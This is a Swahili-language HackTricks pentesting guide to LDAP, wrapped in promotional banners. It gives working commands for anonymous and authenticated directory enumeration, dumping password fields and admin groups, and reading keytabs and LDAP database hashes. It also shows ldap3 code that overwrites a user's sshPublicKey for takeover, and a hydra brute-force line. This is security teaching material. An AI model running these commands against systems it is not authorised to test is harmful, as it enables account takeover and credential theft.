# 389, 636, 3268, 3269 - Pentesting LDAP
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! Njia nyingine za kusaidia HackTricks: * Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! * Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) * Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee * **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
Matumizi ya **LDAP** (Itifaki ya Upatikanaji wa Miongozo ya Kupunguzwa) ni hasa kwa kutambua miundo mbalimbali kama vile mashirika, watu binafsi, na rasilimali kama faili na vifaa ndani ya mitandao, ya umma na binafsi. Inatoa njia iliyopangwa ikilinganishwa na mtangulizi wake, DAP, kwa kuwa na kiasi kidogo cha msimbo. Vyanzo vya LDAP vimepangwa kuruhusu usambazaji wao kwenye seva kadhaa, kila seva ikiwa na toleo lililorekebishwa na kusawazishwa la chanzo, linalojulikana kama Wakala wa Mfumo wa Miongozo (DSA). Jukumu la kushughulikia maombi liko kabisa kwa seva ya LDAP, ambayo inaweza kuwasiliana na DSAs nyingine kama inavyohitajika kutoa jibu la pamoja kwa mwenyeombaji. Ukadiriaji wa muundo wa chanzo cha LDAP unaonekana kama **hiraki ya mti, ikiwa na chanzo cha mizizi juu**. Hii inatengana hadi nchi, ambazo zinagawanyika zaidi katika mashirika, na kisha kwenye vitengo vya shirika vinavyowakilisha sehemu tofauti au idara, hatimaye kufikia kiwango cha miundo ya kibinafsi, ikiwa ni pamoja na watu na rasilimali zinazoshirikishwa kama faili na printa. **Bandari ya chaguo-msingi:** 389 na 636 (ldaps). Katalogi ya Kijumla (LDAP katika ActiveDirectory) inapatikana kwa chaguo-msingi kwenye bandari 3268, na 3269 kwa LDAPS. ``` PORT STATE SERVICE REASON 389/tcp open ldap syn-ack 636/tcp open tcpwrapped ``` ### Fomati ya Kubadilishana Data ya LDAP LDIF (LDAP Data Interchange Format) inadefine maudhui ya saraka kama seti ya rekodi. Pia inaweza kuwakilisha maombi ya marekebisho (Ongeza, Badilisha, Futa, Badilisha Jina). ```bash dn: dc=local dc: local objectClass: dcObject dn: dc=moneycorp,dc=local dc: moneycorp objectClass: dcObject objectClass: organization dn ou=it,dc=moneycorp,dc=local objectClass: organizationalUnit ou: dev dn: ou=marketing,dc=moneycorp,dc=local objectClass: organizationalUnit Ou: sales dn: cn= ,ou= ,dc=moneycorp,dc=local objectClass: personalData cn: sn: gn: uid: ou: mail: pepe@hacktricks.xyz phone: 23627387495 ``` * Mistari 1-3 yanafafanua kikoa cha kiwango cha juu local * Mistari 5-8 yanafafanua kikoa cha kiwango cha kwanza moneycorp (moneycorp.local) * Mistari 10-16 yanafafanua vitengo viwili vya shirika: dev na mauzo * Mistari 18-26 yanajenga kitu cha kikoa na kumtambulisha kwa sifa zenye thamani ## Andika data Tafadhali kumbuka kwamba ukibadilisha thamani unaweza kufanya vitendo vya kuvutia sana. Kwa mfano, fikiria kwamba **unaweza kubadilisha habari ya "sshPublicKey"** ya mtumiaji wako au mtumiaji yeyote. Ni jambo la uwezekano mkubwa kwamba kama sifa hii ipo, basi **ssh inasoma funguo za umma kutoka LDAP**. Ukibadilisha funguo ya umma ya mtumiaji utaweza **kuingia kama mtumiaji huyo hata kama uthibitishaji wa nenosiri haujaruhusiwa kwenye ssh**. ```bash # Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/ >>> import ldap3 >>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True) >>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True) >>> connection.bind() True >>> connection.extend.standard.who_am_i() u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN' >>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]}) ``` ## Kunasa vibali vya maandishi wazi Ikiwa LDAP inatumika bila SSL unaweza **kunasa vibali kwa maandishi wazi** kwenye mtandao. Pia, unaweza kufanya shambulio la **MITM** kwenye mtandao **kati ya seva ya LDAP na mteja.** Hapa unaweza kufanya **Shambulio la Kupunguza kiwango** ili mteja atumie **vibali kwa maandishi wazi** kuingia. **Ikiwa SSL inatumika** unaweza kujaribu kufanya **MITM** kama ilivyotajwa hapo juu lakini kwa kutoa **cheti bandia**, ikiwa **mtumiaji atakubali**, unaweza Kupunguza kiwango cha njia ya uthibitishaji na kuona vibali tena. ## Upatikanaji wa Anonimasi ### Kupuuza ukaguzi wa TLS SNI Kulingana na [**hii andishi**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) kwa kufikia seva ya LDAP na jina la kikoa cha kupindukia (kama kampuni.com) alikuwa na uwezo wa kuwasiliana na huduma ya LDAP na kutoa habari kama mtumiaji asiyejulikana: ```bash ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" + ``` ### Kujumuishwa kwa LDAP [Kujumuishwa kwa LDAP](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) inaruhusu **wahalifu wasiothibitishwa** kupata habari kutoka kwa uwanja, kama orodha kamili ya watumiaji, vikundi, kompyuta, sifa za akaunti ya mtumiaji, na sera ya nenosiri la uwanja. Hii ni **mipangilio ya zamani**, na kuanzia Windows Server 2003, watumiaji waliothibitishwa pekee wanaruhusiwa kuanzisha maombi ya LDAP.\ Hata hivyo, waendeshaji wa mfumo wanaweza kuwa wamehitaji **kuweka programu fulani kuruhusu kujumuishwa kwa siri** na kutoa upatikanaji zaidi kuliko ilivyokusudiwa, hivyo kuwapa watumiaji wasiothibitishwa upatikanaji wa vitu vyote katika AD. ## Vibali Sahihi Ikiwa una vibali sahihi kuingia kwenye seva ya LDAP, unaweza kudumpisha habari yote kuhusu Msimamizi wa Uwanja kwa kutumia: [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump) ```bash pip3 install ldapdomaindump ldapdomaindump [-r ] -u '\' -p '' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir] ``` ### [Kujaribu Kuingia Kwa Nguvu](../generic-methodologies-and-resources/brute-force.md#ldap) ## Uchambuzi ### Kiotomatiki Kwa kutumia hii utaweza kuona **taarifa za umma** (kama jina la uwanja)**:** ```bash nmap -n -sV --script "ldap* and not brute" #Using anonymous credentials ``` ### Python
Angalia uorodheshaji wa LDAP na python Unaweza kujaribu **kuorodhesha LDAP bila au na** sifa za kutumia python: `pip3 install ldap3` Kwanza jaribu **kuunganisha bila** sifa: ```bash >>> import ldap3 >>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True) >>> connection = ldap3.Connection(server) >>> connection.bind() True >>> server.info ``` Ikiwa jibu ni `True` kama ilivyokuwa kwenye mfano uliopita, unaweza kupata baadhi ya **data za kuvutia** za LDAP (kama **muktadha wa kutaja** au **jina la uwanja**) kutoka: ```bash >>> server.info DSA info (from DSE): Supported LDAP versions: 3 Naming contexts: dc=DOMAIN,dc=DOMAIN ``` Baada ya kupata muktadha wa jina unaweza kufanya maswali mazuri zaidi. Hili swali rahisi litakuonyesha vitu vyote katika orodha: ```bash >>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*') True >> connection.entries ``` Au **tolea nje** ldap nzima: ```bash >> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword') True >>> connection.entries ```
### windapsearch [**Windapsearch**](https://github.com/ropnop/windapsearch) ni skripti ya Python inayofaa kwa **kutambua watumiaji, vikundi, na kompyuta kutoka kwenye** kikoa cha Windows kwa kutumia matakwa ya LDAP. ```bash # Get computers python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers # Get groups python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups # Get users python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da # Get Domain Admins python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da # Get Privileged Users python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users ``` ### ldapsearch Angalia mibofu ya siri au kama mibofu yako ni halali: ```bash ldapsearch -x -H ldap:// -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=" ldapsearch -x -H ldap:// -D '\' -w '' -b "DC=<1_SUBDOMAIN>,DC=" ``` ```bash # CREDENTIALS NOT VALID RESPONSE search: 2 result: 1 Operations error text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera tion a successful bind must be completed on the connection., data 0, v3839 ``` Ikiwa unapata kitu kinasema kwamba "_bind lazima ikamilike_" inamaanisha kuwa sifa za kuingia si sahihi. Unaweza kutoa **kila kitu kutoka kwa kikoa** kwa kutumia: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "DC=<1_SUBDOMAIN>,DC=" -x Simple Authentication -H LDAP Server -D My User -w My password -b Base site, all data from here will be given ``` Chambua **watumiaji**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=" #Example: ldapsearch -x -H ldap:// -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local" ``` **Chuja** kompyuta: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=" ``` Chukua **maelezo yangu**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=,CN=Users,DC=<1_SUBDOMAIN>,DC=" ``` **Chimbuko la Domain Admins**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=" ``` Hakikisha kuchambua **Watumiaji wa Kikoa**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=" ``` Chimbua **Enterprise Admins**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=" ``` Chimbua **Waendeshaji**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=" ``` ### Extract **Kikundi cha Duka la Mbali**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=" ``` Ili kuona kama una ufikiaji wa nenosiri lolote unaweza kutumia grep baada ya kutekeleza moja ya maswali: ```bash | grep -i -A2 -B2 "userpas" ``` #### pbis Unaweza kupakua **pbis** kutoka hapa: [https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/) na kawaida huiweka katika `/opt/pbis`.\ **Pbis** inakuruhusu kupata habari za msingi kwa urahisi: ```bash #Read keytab file ./klist -k /etc/krb5.keytab #Get known domains info ./get-status ./lsa get-status #Get basic metrics ./get-metrics ./lsa get-metrics #Get users ./enum-users ./lsa enum-users #Get groups ./enum-groups ./lsa enum-groups #Get all kind of objects ./enum-objects ./lsa enum-objects #Get groups of a user ./list-groups-for-user ./lsa list-groups-for-user #Get groups of each user ./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done #Get users of a group ./enum-members --by-name "domain admins" ./lsa enum-members --by-name "domain admins" #Get users of each group ./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done #Get description of each user ./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n | grep "CN" | while read line; do echo "$line"; ./adtool --keytab=/etc/krb5.keytab -n -a lookup-object --dn="$line" --attr "description"; echo "======================" done ``` ## Interface ya Picha ### Apache Directory [**Pakua Apache Directory kutoka hapa**](https://directory.apache.org/studio/download/download-linux.html). Unaweza kupata [mfano wa jinsi ya kutumia chombo hiki hapa](https://www.youtube.com/watch?v=VofMBg2VLnw\&t=3840s). ### jxplorer Unaweza kupakua interface ya picha na seva ya LDAP hapa: [http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html) Kwa chaguo-msingi inasakinishwa katika: _/opt/jxplorer_ ![](<../.gitbook/assets/image (482).png>) ### Godap Unaweza kupata hapa [https://github.com/Macmod/godap](https://github.com/Macmod/godap) ## Uthibitishaji kupitia kerberos Kwa kutumia `ldapsearch` unaweza **kuthibitisha** dhidi ya **kerberos badala** ya kupitia **NTLM** kwa kutumia parameter `-Y GSSAPI` ## POST Ikiwa unaweza kupata faili ambapo mabadiliko yanapatikana (inaweza kuwa katika _/var/lib/ldap_). Unaweza kutoa hash kutumia: ```bash cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u ``` ### Faili za Mipangilio * Kwa Ujumla * containers.ldif * ldap.cfg * ldap.conf * ldap.xml * ldap-config.xml * ldap-realm.xml * slapd.conf * Seva ya IBM SecureWay V3 * V3.sas.oc * Seva ya Microsoft Active Directory * msadClassesAttrs.ldif * Seva ya Netscape Directory 4 * nsslapd.sas\_at.conf * nsslapd.sas\_oc.conf * Seva ya OpenLDAP directory * slapd.sas\_at.conf * slapd.sas\_oc.conf * Seva ya Sun ONE Directory 5.1 * 75sas.ldif ``` Protocol_Name: LDAP #Protocol Abbreviation if there is one. Port_Number: 389,636 #Comma separated if there is more than one. Protocol_Description: Lightweight Directory Access Protocol #Protocol Abbreviation Spelled out Entry_1: Name: Notes Description: Notes for LDAP Note: | The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint. https://book.hacktricks.xyz/pentesting/pentesting-ldap Entry_2: Name: Banner Grab Description: Grab LDAP Banner Command: nmap -p 389 --script ldap-search -Pn {IP} Entry_3: Name: LdapSearch Description: Base LdapSearch Command: ldapsearch -H ldap://{IP} -x Entry_4: Name: LdapSearch Naming Context Dump Description: Attempt to get LDAP Naming Context Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts Entry_5: Name: LdapSearch Big Dump Description: Need Naming Context to do big dump Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}" Entry_6: Name: Hydra Brute Force Description: Need User Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f ```
Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! Njia nyingine za kusaidia HackTricks: * Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! * Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) * Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family) * **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.